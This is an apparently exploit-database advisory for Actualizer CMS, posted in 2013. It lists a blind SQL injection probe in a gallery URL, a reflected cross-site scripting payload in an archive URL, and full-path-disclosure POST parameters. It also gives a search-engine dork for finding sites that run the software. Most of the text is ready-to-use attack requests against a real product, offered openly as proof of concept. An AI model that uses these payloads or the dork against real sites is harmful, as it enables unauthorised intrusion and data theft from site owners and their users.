Home / exploitsPDF  

Actualizer CMS Multiple Vulnerabilities

Posted on 24 September 2013

#Title: Actualizer CMS - Multiple Vulnerabilities #Date: 22.09.2013 #Tested on: Linux 3.0 - 3.9 (95%) #Vendor: actualizer.pl #Dork: intext:"Powered by Actualizer & Heuristic" #Contact: smash@devilteam.pl 1. Blind SQL Injection host/galeria/galeria-2/gal,1'%20or%20'1'='2.html - false host/galeria/galeria-2/gal,1'%20or%20'1'='1.html - true PoC: http://demo.aXXXXXXXXXX.pl/galeria/galeria-2/gal,1'%20or%20'1'='2.html 2. Cross Site Scripting host/katalog/nowosci/archiwum/year," onmouseover%3dalert(666) bad%3d".html PoC: demoXXX.pl/katalog/nowosci/archiwum/year," onmouseover%3dalert(666) bad%3d".html 3. Full Path Disclosure host/newsletter.php POST: action=save&cat=666%email[]=asdf@asdf.com&imie=devil host/konto/rejestracja POST (multipart): login=1

 

TOP